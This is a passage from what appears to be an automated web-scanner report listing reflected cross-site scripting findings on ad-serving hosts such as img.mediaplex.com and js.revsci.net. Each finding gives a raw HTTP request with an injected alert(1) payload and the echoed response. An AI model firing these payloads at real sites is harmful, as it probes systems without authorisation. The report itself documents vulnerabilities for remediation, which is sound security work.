The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcc14"%3balert(1)//e7e1890eed was submitted in the mpvc parameter. This input was echoed as fcc14";alert(1)//e7e1890eed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Bed_v2.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5ee708d29c&mpt=4df5ee708d29c&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5ee708e621-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130347-_ge_=1^2^adf7d753c2cad14637ca99c7d3d008a2-ord=4876240110024810-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=3-seq=1-tt=j-atf=0-url=txanco-flg=64-u=b0033fawbst1ssbzd4i,f0f02sa,g10001s-_gclick_gaclk4df5ee708e621fcc14"%3balert(1)//e7e1890eed HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/9966:1105/17550:1884/15017:13113/12309:3981/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:03:55 GMT
Server: Apache
Last-Modified: Mon, 23 May 2011 13:05:23 GMT
ETag: "597796-f11-4a3f11fcfcac0"
Accept-Ranges: bytes
Content-Length: 10025
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
a2-ord=4876240110024810-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=3-seq=1-tt=j-atf=0-url=txanco-flg=64-u=b0033fawbst1ssbzd4i,f0f02sa,g10001s-_gclick_gaclk4df5ee708e621fcc14";alert(1)//e7e1890eedhttp://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5ee708d29c&clickTag=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5ee708e621-_advid=50002325-_adid=5000042624-_c
...[SNIP]...

4.208. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abcb2"%3balert(1)//f7f8cdc1066 was submitted in the mpck parameter. This input was echoed as abcb2";alert(1)//f7f8cdc1066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72abcb2"%3balert(1)//f7f8cdc1066&mpt=4df5f0d4b6b72&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:06 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 10080
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
15232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaplex.com/ad/ck/17038-128465-20406-11?mpt=4df5f0d4b6b72abcb2";alert(1)//f7f8cdc1066\" target=\"_blank\">
...[SNIP]...

4.209. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15019"%3balert(1)//631112dc0bc was submitted in the mpt parameter. This input was echoed as 15019";alert(1)//631112dc0bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72&mpt=4df5f0d4b6b7215019"%3balert(1)//631112dc0bc&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:09 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 9692
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
ined') {adldspsend(mcdt);}
    else { setTimeout('w_adldspsend ("'+mcdt.replace(/"/g, '\\"')+'")',200); }
   }
   var mcdt='3817/'+ cl +'/'+ cm +'/'+ m +'/7488927/7488927/'+ st +'/[SiteName]/4df5f0d4b6b7215019";alert(1)//631112dc0bc';
   w_adldspsend(mcdt);

4.210. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17038/128465/Roxy_728x90_Female_Butt.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload deca0"%3balert(1)//d0ea7c59127 was submitted in the mpvc parameter. This input was echoed as deca0";alert(1)//d0ea7c59127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72&mpt=4df5f0d4b6b72&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9deca0"%3balert(1)//d0ea7c59127 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:11 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 15:07:25 GMT
ETag: "525a29-f07-4a2d932756540"
Accept-Ranges: bytes
Content-Length: 10028
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9deca0";alert(1)//d0ea7c59127http://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72&clickTag=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_c
...[SNIP]...

4.211. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload d2fa0<script>alert(1)</script>d146637a0e7 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H07710d2fa0<script>alert(1)</script>d146637a0e7 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3hc5wFS813Gq63dQ4yV9iELcns7XRnSRJyu5Y8IIde+Kg6mfGZlUB4SruQI4rTs4y2UgncVUg67T0dB9naIhEG35bFZpiOLnlDeWfgSTEifCxEyJ1ceTv+CvvfhLsErHWoX5vAgUisClWxkkFkhxs6Sv1tjV/vyxy4fyHWGaZ9JT9qnb+FkC8amdlQjXUQiyisWC5oDDw0PhPbCP3F9Z1qxK0beEcbhyyvGzihAkA/Vfk5Knkfc8nh+j/k1YU55yv/Pj6+8pRjOs0eCnapK0c7govd9KIGekeA92uHXiJmdOH3Fj86gGCeUHtlngmDdE3wiQpjMJinyKJsp3NUVfgvynJ8ChbRL1hJtD4ix7620XA3Cu43Q7rUALrFRB7hSYbnxH1DiakaRoPQGlDgsmHcZ6VNJViQNDlUUNBtQC9V/Bo1B8SV1qPwPkqpqKMoKx4EVolbD9I+B5ZaTp6LdNkplgtQGq2GBFC0RP20KwexUAxyyET0gYqUuE8snZn+eSFplsIg1DUqqukxdFonny1plhRnx77ZiZ/YytfcasGUM6qBoU8LURR266NFiuMKy3Q7qSqVNThgHPly1BQtxmYuE1I2to+TWhZgmpwEbU6M/Z9t8dBAw/RoVAXfz4gC+Ix2ftyJnvHv9D2uGCArULbvHTLc+r6V2GdNA0Qch7qlUOsrFgpzcj5CfW3dEVFQdPkbT1uGdCmrXtCPx3t/I0bCTNvXA8tkeYkWwjXW5dSJPOoB8XWpy37JCPFsCXQBX6nI88AH++/1ww9pK76sPlx5hKUa+2lHQS9q0ssezOFdXJbxOIoP2/zVx7uNsWnulFgCUuGnZiv34zCdfIwORufZ/aFEbttB86Ty9IbNn1bPDk89J2JRbg2tYNleBBsRFD+ezR2ymlRUIZM1BlN3xid2OePOp2U/AsvF1a0JuT7MtoUkFmGqGNRTtReaom/4ubmFRLyawfTvXiRUf+9sYaXeajN9TIQZcYUHADPCytuemY6ogkyV8cvZpCiidb5NjP5ZHu2i1ZADHx2Z3GJg/74NQ5iDinPeSBGyQLrVGSmL8EI2ychKfySxZaVn0pR/X58c6ZROzpGbWFWEBdbXRtX57fcyU0J6HPGhhU6ja7heRrL6zMkHx24erUBtdcdKoCEQkWDvqFAUiZjWn2pQrJBmDDPJiDAhugHkPqBuRwoNkcFHM+Ul1CXV0xjhlpTJAN5BWVuiNwGr2UO4VipnJucbDlYsFREeH5YdOwEjKBA/E9Rt9BLiuJBMlxjdA5LAipAsvZqktR2IY/FiQaf9UqERS6fceUDbpf2RHgSxyB6GJmoT5/jWlVrw7+UqF/SBkEGMBMSGrfRvLoQbh+VWCASXh9QowKqow4YiH3URFCK98HsRl+ktH12AxKPTkO3N3ku/EoB8w+GDlrCM8/rz0p5O2U4rFI8tTeaQnc9s/cxneMy93qzcjR2EsI311rxEnOippysW4MsvYNXJV2DVTJx5dMgzdL+sjtnJObK46UpX+uvyYcKXRWZORvu59UXBHjMTQOFsaamGFEJlVtL6RuDUn7c0hZKI3ihf5kDNRl5G5vN5jkwCaqUDdKc1rya43vP0DgBrQrrnh22h/hLsSXrw0kmDs/yvZvB3yF8Ma2aUzT7TwofCD8sSXhkJ5pmhWPgOtW76NBA7LDWFkE1u9KpZPYUEKnzM2LYQqZUm3eYoh+G78=; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_KnBd="MLsXtaEuLjhnJ5H4uuj6RIn8q1zxXkRaxrcCnA/XZiexnJudKcBKFqX3d5gJtWlys7/aNmF8oZqyUuBF44LLsBp/XmHM56eUfVPr2ig9T6usUThEu2SqpAPvDqb6CyW6nYvjH55JvTEz7ztCB8UDyiuPPYeValoCtghc53ATcftLlZjnEgAPGIuT3ccVrMzGzcsN38GTvgf4/xW4hsUQY0o/mUCkjdomf5pMOwHwd7oxLJKSBO3UaEv1fSc+XxMcAbYQgzBKRrnTMVWQerlfyFrtHciD2WRj9Hl6FvA3VUak9Qt7o0e6fPEJsGJqVJkoLLdjSFpfpsMzHUbwM9OnItS46jK+7cAOnbtY8Ab340ENjp4oJt9Sm3XYqMgVtXazcRrw1dRB94ZkpCzHTf1wGhBH4TVzFOPMgM4VvO6l9W2pCbe9gL6mIu2Z3iV1SL6CRrHrt2hhFeS7E6X/JOCAGFAS8J4uXu8CfVms2bvl/TNZEa+jwdcWhmDo9rJzyLgpp2J9+0ZVtKPBK2fa00U8mjxUHtREi1DlGEWGI9qC72INlQ96yKONNH2Usf54jWCV59JB9+pmKoptb/M3tn1UBxLw7TOrvaGH2Vgu0qnpeESbbFW8oYECJwOx+T0PnZUmJyMAgUnwKdSxoQ5/oODIcrlhJ3cCFfD92UhjutN0crrFdWgNkQS65AT600jwikq34ITDYHMDmrqLYKfXZH2GgJjvI6nApXpU17mCK4ZqgCncSzwSyPT2t+2Hoqj4v1Y/Vl7cpU+m3uzXpoMQVtf2UGhbGYYYnXDE3CzsOhxZQeVgvkyopNpVxf2ol5Xxx/AhCkYT767N3KzAydtiKelxQf/g6tHbcsBwA9TTn9OrvCvjv6WdzqYlx9izGGG45S9WZPu7/zyeEoWybPlMvNc1Rpc/y2Cx9GUqJic9l6xTJAngZJXSZs+o41XOifpIFlJ7B4F+f607RMUfq1lseGpu+QNpPJM2iNlqXoTt9ik8U7vM8LgvcO1ZptgPI0/dOoVc//bTvzAueoNhAfybFk6RtIDuCQDEkWQQR/s00vMesVzR6+fjte0Ly7xbOq7Bq99zQL6bL0v73Fdn48baV2n71UFIbXsDqYg0kQCEo6eQ7NMyDvoCntLca0rKDrq4L/m0kT4FQlcT4jJF4rFH4hjWRpsoJAOPN4Aiz8qNXUY2XFyk45k984HTHv0NaRezUn0="; rsi_us_1000000="pUMlIy9H8BcU1P0/aqfkn2N1Aq78OHBl6ClrIVZfGzy1dmru/yhlpNRC/j+GgwUFYepOSFGHO/u1DXARCouzHHG+Ls8oVOk785qoU49AFwdml7FIDyQFDkTfPuH49HV1gXUZzy1SDhGCyhiPghO6BHg2KLacLC+JEomvevEz6AY4oFrYW/OTa8RlNPT19z7QLUXQbB6WQO7hrNSFTifVi+754gCvaBXBI5blvrX3W24Lr/6MwZDupYRWDMgGlTbvqpXv5leOYJIzI7SKLGy+IkwLaQ5E8hFwcUR/PCuBff/io/cjLbekqoieI1ELq8FXyhCdQ1ACHYn7+ZvsES11hQIq4yoVbtXQxVV9t5NEBwSv52icvj+fazqjuBUDZqw6BMDFY1K0sGNP9AOV4dT0ZhkTUQKsNT5/saAfR02CuGJK2rvaOKD9gTJUC/OOzDipobfdkJXYpsIXw2UiHUAeG38+6iUD9f24sH99k1q4QnShLTk2pbo+o6hEnr1SuDiz2Zc05B3RFfjTL2XZKuY/6eJCvw5B+ATymkNPiduuVgdeMHgMbwBTLFrOyP9TNSBZj4Z20Thdkoq/JyC8TH2eGO67FpwbVwGRx0b58He54D+AuAs5NNJVJeYha8gH8z+xOmSASpGJiBYY0UJW4Viy6eGQW2yNBastWhlxKoAnEpxuUsX33D3Jg7g3SMuEafTE3fFuGDlYUqrqWKEmBPF80lk+ykIO7FV6aF+4HF4UfYb7pA2L1g4oJE7gC+gEoCa+8CO4CAwoq8u4uvhwP56Pqv67srZgc4KfctHd5PY7lw+a1Doo4feQnlTa004zqSpWZ0cCh+x3qe+YJX8VGrKFBMGhQYyRtCtk2knN3OYQA7msg92HTm59G/lRvCd6IG1whn56kAc5eab/XpjluPIhh5r42fW1PPhevizTX5xNfLGPKg9+DOkAAVviDd8QpB+l9AWhhLpvS/KxYUAD1ZsedzdxsvRtr47/NbY7zlokTT639ngCJdSYkoq/N2d0hVMLGJ48b+XHrlzxh2zDkqYdpxZUA3IM6P1xQc0svwKk1XNb/h98JSrluzt7ewlP086tEzGourMC/RiWI4qdzHtVA4mNj5N+bCVGnyTuAoASB3OcSfq+kRPtoaUYJqkSueYSUrY03w/uoIAx8JaQc+YY1IB2EYem+UC3xKUas15kfbkv5mj29FtMloeU2fEWNjjE89J3i6pqtMssOIDJfHMCCezbfKMmTcGsiyFy/h183mZz9Bxo25q82nH5wHCOV963RzbZ+wLit78ETIizggf6HdYsEgHUsN9DZYcwpm97D7vYIWkEvVkhQ577tdx77XTsyM1waDuwz0mriwb0RVNxpuVjh74wJGO3Khd1Ej2G4l0wXXVeRXLaJpg3SjIhrAnkkm8lNJISMd64qsZX1BCKB4ogn8R57pQ/70kokmUAJkxtweHE7PHnhKC5eqqvGuB4qH4bp1S1f58dV8/Pkw2Ck8V/XMs4t4Khrz8TctV2753gQOb+Wrey1F5MQDCma4c0vVj0hY1BL3laNqQqgyHbRtQRsEgKiD1tulYdIPVXYixeTks0537ikMNaohAvHzDgnzmpsz5etYpkfcGkMw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS8NW9oZDZFaEP3/Yfrnhu4IU3vheM/Ns0vAjloMpK625XiMz/7xhK4LyZJaQSIcY62RPvVLOf3Rqv8g6s+S0M37pSe4EUYkkllytqzoreA1HphdoGataiGY4MsnrRzbfN6fbGCdJ172IioJGG1zG79GGw30oDC4C7VmxYrej3tFQObZgU/tZkjzZn3Hdaqh0eSrDXnAp9zEz+/boOL3WcogTsj3/5fveweY9zxSv/NNwjuCrs5KZBGPT52bhf9l1YcBc1sBVfIM0OwL3Q45hRQoNrZ+sSycfMhs3uZuHsbYIbscOzTaWr8wcP588YnH8VwzJkxibne7pWZ+tDF3WLkweCsOEB2wduQ/Nt+cxKZtZnWKHe6ubb1RHQU/4XJhond4VmDT+2+NQRAcIqO6b7DwRmCs6bBKfFEsME2KDEO7yQvuJyHviRatdQMpprGvH8Wo5s4ekgfmi9/UxSZ3IIYryMySkUDTqkcuv2l2EsbCBlgSv+kEo3KEj2gb4P8DVwOHPUvbXXxaY2U9CXG8qiIj8oYq2earIwKHoufO8sYTyJ9sisD/FTESrdnc4kYVPvw/iARgA4NrcDBkZaQk=; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; rtc_eC0O=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 13 Jun 2011 11:22:42 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 14 Jun 2011 11:22:42 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:22:41 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "H07710D2FA0<SCRIPT>ALERT(1)</SCRIPT>D146637A0E7" was not recognized.
*/

4.212. http://k.collective-media.net/cmadj/cm.mtv/ent_010111 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.mtv/ent_010111

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80134'-alert(1)-'42c7e873823 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

